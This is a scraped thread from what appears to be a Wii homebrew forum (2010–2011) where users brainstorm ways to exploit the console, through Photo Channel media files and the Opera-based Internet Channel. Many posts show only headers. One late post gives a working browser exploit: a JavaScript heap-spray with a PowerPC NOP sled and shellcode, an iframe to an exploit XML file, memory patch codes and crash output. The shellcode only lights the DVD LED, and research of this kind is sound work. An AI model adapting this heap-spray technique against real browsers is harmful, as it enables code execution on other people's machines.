Idea for new Wii exploits? December 03, 2010 01:04PM | Registered: 14 years ago Posts: 21 |
Re: Idea for new Wii exploits? December 03, 2010 05:34PM | Moderator Registered: 15 years ago Posts: 5,075 |
Re: Idea for new Wii exploits? December 06, 2010 02:59AM | Registered: 14 years ago Posts: 21 |
You're right! They're just different file extensions for the same file format! :PQuote
SifJar
(...) I thought AAC and M4A were the same anyway? Maybe I got confused... (...)
Re: Idea for new Wii exploits? December 07, 2010 03:52PM | Registered: 14 years ago Posts: 21 |
Btw, Photo Channel v1.1 still supports AAC/M4A files, like mentioned here! ;)Quote
SifJar
Also, I believe in v1.1, they removed the music playing, so no MP3, AAC or M4A
Re: Idea for new Wii exploits? December 07, 2010 07:18PM | Admin Registered: 16 years ago Posts: 3,247 |
Re: Idea for new Wii exploits? December 08, 2010 12:01PM | Registered: 15 years ago Posts: 379 |
Re: Idea for new Wii exploits? February 08, 2011 07:43PM | Registered: 13 years ago Posts: 3 |
Re: Idea for new Wii exploits? February 09, 2011 06:20PM | Registered: 15 years ago Posts: 188 |
That php exec func is _only_ for executing software on the web server, not the client.Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"
Maybe host a .dol file on a webserver somewhere?
Re: Idea for new Wii exploits? February 09, 2011 09:13PM | Registered: 15 years ago Posts: 1,597 |
Re: Idea for new Wii exploits? February 09, 2011 09:32PM | Moderator Registered: 15 years ago Posts: 5,075 |
Re: Idea for new Wii exploits? February 09, 2011 09:40PM | Registered: 15 years ago Posts: 1,597 |
Re: Idea for new Wii exploits? February 09, 2011 11:38PM | Admin Registered: 16 years ago Posts: 3,247 |
Re: Idea for new Wii exploits? February 10, 2011 04:03AM | Registered: 13 years ago Posts: 3 |
Quote
yellowstarThat php exec func is _only_ for executing software on the web server, not the client.Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"
Maybe host a .dol file on a webserver somewhere?
Re: Idea for new Wii exploits? February 10, 2011 07:01PM | Moderator Registered: 15 years ago Posts: 5,075 |
Re: Idea for new Wii exploits? February 10, 2011 07:22PM | Registered: 15 years ago Posts: 188 |
Quote
ottoQuote
yellowstarThat php exec func is _only_ for executing software on the web server, not the client.Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"
Maybe host a .dol file on a webserver somewhere?
I see. I know that Opera has some decent exploits. Most of the stuff I have read is mainly for Opera 11. I've done some more reading on Opera 9 for wii and it doesn't even look like it supports php scripts anyway
[www.opera.com]
But it does have XML support
[securitytracker.com] -this one is to exploit a .dll file, but I'm still looking around at some other sites as well.
I know that packetstorm has some opera exploits in their database...
[packetstormsecurity.org]
If I am able to compromise the wii through opera and the internet channel, would I have access to the wii's nand?
Also back to the original subject and PhotoChannel. Has anyone come up with a steganography program that can launch embedded code?
Re: Idea for new Wii exploits? February 10, 2011 08:34PM | Registered: 14 years ago Posts: 21 |
Re: Idea for new Wii exploits? February 24, 2011 11:50PM | Registered: 15 years ago Posts: 1 |
$ strings -t x batman.dol | grep 'Metrowerks Target' 287 Metrowerks Target Resident Kernel for PowerPC
$ xxd 00000028.app | grep 'arget Re' -A 3 -B 1 0000390: a638 1021 0010 33bf 4d65 7472 006f 7765 .8.!..3.Metr.owe 00003a0: 726b 7320 5400 6172 6765 7420 5265 0073 rks T.arget Re.s 00003b0: 6964 656e 7420 4b00 6572 6e65 6c20 666f ident K.ernel fo 00003c0: 1372 2050 3022 5043 00b4 2c0a 601b 0c48 .r P0"PC..,.`..H 00003d0: 092f 3c0c 20d6 0181 a97c 5100 43a6 7c5a ./<. ....|Q.C.|Z
[fwrite patch for inetchannel] * 040869E8 7C8429D6 * 040869EC 39400000 * 040869F0 9421FFF0 * 040869F4 93E1000C * 040869F8 7F8A2000 * 040869FC 409C0064 * 04086A00 3D00CD00 * 04086A04 3D60CD00 * 04086A08 3D20CD00 * 04086A0C 61086814 * 04086A10 616B6824 * 04086A14 61296820 * 04086A18 398000D0 * 04086A1C 38C00019 * 04086A20 38E00000 * 04086A24 91880000 * 04086A28 7C0350AE * 04086A2C 5400A016 * 04086A30 6400B000 * 04086A34 900B0000 * 04086A38 90C90000 * 04086A3C 80090000 * 04086A40 701F0001 * 04086A44 4082FFF8 * 04086A48 800B0000 * 04086A4C 90E80000 * 04086A50 540037FE * 04086A54 7D4A0214 * 04086A58 7F8A2000 * 04086A5C 419CFFC8 * 04086A60 7CA32B78 * 04086A64 83E1000C * 04086A68 38210010 * 04086A6C 4E800020
Attempted to fetch instruction from invalid address 0x91150bb8 (read from SRR0)to make it short, you can control the data in that region. how? allocate stuff on the heap is quite easy in a browser, just allocate some data in the java script virtual maschine and do that several times (aka "heap spraying"). my code for that:
SCRIPT var i = 0x3377331; //force the VM to align the data, since there's code after it var str = "\u6000\u0000"; //nop //place many many NOPs here, since we don't know exactly where it jumps in here. for (i = 0; i < 20; i++) { str += str; } //enlighten the DVD-drive LED! str += "\u3d20\ucd80"; //lis 9,0xcd80 str += "\u3900\u0020"; //li 8,0x20 str += "\u9109\u00c0"; //stw 8,0xc0(9) str += "\u4e80\u0020"; //blr str += "\u6000"; //proper padding. again alignment stuff arr = new Array(100); for (i = 0; i < 100; i++) { arr = str; } alert(arr[4]); /SCRIPT BODY IFRAME src="evil_xml_exploit.xml" /BODY <!-- well, correct the html tags above on your own. somehow the forum software fuck them up :) -->on x86 it's a bit easier than here, because a nop is just "0x90", i.e. just one byte, so you don't have to care about alignment in this case. fortunately, you can fool the java script VM by allocate a variable of the size u32. it's better for the VM to place that on an aligned address, in order to load/store it with one instruction. therefore, data after that is also (properly) aligned.
Re: Idea for new Wii exploits? February 25, 2011 12:21AM | Admin Registered: 16 years ago Posts: 3,247 |
Re: Idea for new Wii exploits? February 25, 2011 10:12AM | Registered: 15 years ago Posts: 379 |
Re: Idea for new Wii exploits? February 26, 2011 06:02AM | Registered: 13 years ago Posts: 3 |